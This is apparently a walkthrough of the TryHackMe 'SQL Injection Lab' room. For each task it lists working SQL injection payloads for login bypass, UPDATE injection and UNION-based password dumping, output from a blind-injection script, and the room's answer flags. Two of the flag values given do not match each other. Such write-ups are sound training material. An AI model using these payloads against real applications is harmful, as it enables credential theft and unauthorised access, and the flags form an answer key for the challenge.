Tryhackme - SQL Injection Lab

Tryhackme – SQL Injection Lab

In this walk through, we will be going through the SQL Injection Lab room from Tryhackme. This room is meant as an introduction to SQL injection and demonstrates various SQL injection attacks. On that note, let’s get started.

SQL Injection Lab

Task 1 – Introduction

Task 1 - Introduction

Task 2 – Introduction to SQL Injection: Part 1

Question 1 – What is the flag for SQL Injection 1: Input Box Non-String?

1 or 1=1-- -

SQL Injection 1: Input Box Non String

SQL Injection 1: Input Box Non String

THM{dccea429d73d4a6b4f117ac64724f460}

Question 2 – What is the flag for SQL Injection 2: Input Box String?

1' or '1'='1'-- -

SQL Injection 2: Input Box String

SQL Injection 2: Input Box String

THM{356e9de6016b9ac34e02df99a5f755ba}

Question 3 – What is the flag for SQL Injection 3: URL Injection?

http://10.10.241.176:5000/sesqli3/login?profileID=-1' or 1=1-- -&password=a

SQL Injection 3: URL Injection

THM{645eab5d34f81981f5705de54e8a9c36}

Question 4 – What is the flag for SQL Injection 4: POST Injection?

SQL Injection 4: POST Injection

THM{727334fd0f0ea1b836a8d443f09dc8eb}

Task 2 - Introduction to SQL Injection: Part 1

Task 3 – Introduction to SQL Injection: Part 2

Question 1 – What is the flag for SQL Injection 5: UPDATE Statement?

',nickName=(SELECT group_concat(profileID || "," || name || "," || password || "secret") from secrets),email='

Francois's Profile

THM{b3a540515dbd9847c29cffa1bef1edfb}

Task 3 - Introduction to SQL Injection: Part 2

Task 4 – Vulnerable Startup: Broken Authentication

Question 1 – What is the flag for this challenge?

admin' or 1=1-- - 

Login

Broken Authentication Flag

THM{f35f47dcd9d596f0d3860d14cd4c68ec}

Task 4 - Vulnerable Startup: Broken Authentication

Task 5 – Vulnerable Startup: Broken Authentication 2

Question 1 – What is the flag for this challenge?

Flag 5

THM{fb381dfee71ef9c31b93625ad540c9fa}

Task 5 - Vulnerable Startup: Broken Authentication 2

Task 6 – Vulnerable Startup: Broken Authentication 3 (Blind Injection)

Question 1 – What is the flag for this challenge?

wh1terose@fsociety:~/CTF/TryHackme/SQL Injection Lab$ python3 exploit.py 10.10.254.170:5000 -V
T
TH
THM
THM{
THM{f
THM{f1
THM{f1f
THM{f1f4
THM{f1f4e
THM{f1f4e0
THM{f1f4e07
THM{f1f4e075
THM{f1f4e0757
THM{f1f4e0757a
THM{f1f4e0757a0
THM{f1f4e0757a09
THM{f1f4e0757a09a
THM{f1f4e0757a09a0
THM{f1f4e0757a09a0b
THM{f1f4e0757a09a0b8
THM{f1f4e0757a09a0b87
THM{f1f4e0757a09a0b87e
THM{f1f4e0757a09a0b87ee
THM{f1f4e0757a09a0b87eeb
THM{f1f4e0757a09a0b87eeb2
THM{f1f4e0757a09a0b87eeb2f
THM{f1f4e0757a09a0b87eeb2f3
THM{f1f4e0757a09a0b87eeb2f33
THM{f1f4e0757a09a0b87eeb2f33b
THM{f1f4e0757a09a0b87eeb2f33bc
THM{f1f4e0757a09a0b87eeb2f33bca
THM{f1f4e0757a09a0b87eeb2f33bca6
THM{f1f4e0757a09a0b87eeb2f33bca6a
THM{f1f4e0757a09a0b87eeb2f33bca6a5
THM{f1f4e0757a09a0b87eeb2f33bca6a5c
THM{f1f4e0757a09a0b87eeb2f33bca6a5cb
THM{f1f4e0757a09a0b87eeb2f33bca6a5cb}
[+] FLAG: THM{f1f4e0757a09a0b87eeb2f33bca6a5cb}

THM{f1f4e0757a09a0b87eeb2f33bca6a56b}

Task 6 - Vulnerable Startup: Broken Authentication 3 (Blind Injection)

Task 7 – Vulnerable Startup: Vulnerable Notes

Question 1 – What is the flag for this challenge?

'  union select 1,group_concat(password) from users'

Flag

THM{4644c7e157fd5498e7e4026c89650814}

Task 7 - Vulnerable Startup: Vulnerable Notes

Task 8 – Vulnerable Startup: Change Password

Question 1 – What is the flag for this challenge?

admin’-- -
asd

login

THM{cd5c4f197d708fda06979f13d8081013}

Task 8 - Vulnerable Startup: Change Password

Task 9 – Vulnerable Startup: Book Title

Question 1 – What is the flag for this challenge?

http://10.10.201.195:5000/challenge6/book?title=%27)%20or%201=1--%20-

Harry Potter

')UNION SELECT 1,2,3,group_concat(password) from users-- -

Flag

THM{27f8f7ce3c05ca8d6553bc5948a89210}

Task 9 - Vulnerable Startup: Book Title

Task 10 – Vulnerable Startup: Book Title 2

Question 1 – What is the flag for this challenge?

' union select '-1''union select 1,2,3,group_concat(password) from users-- -

Flag

THM{183526c1843c09809695a9979a672f09}

Task 10 - Vulnerable Startup: Book Title 2

Also Read: Tryhackme – SQL Injection

So that was “SQL Injection Lab” for you. In this room, we understand how SQL injection attacks work and how to exploit this vulnerability. We started off with basics of SQL injection attacks and then moved to vulnerabilities like Broken Authentication and vulnerable change password functionality. At last, we exploited a vulnerability in Book Title of our vulnerable application and completed the room. On that note, i will take your leave but stay tuned for the next one and till then, remember to “Hack the planet”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top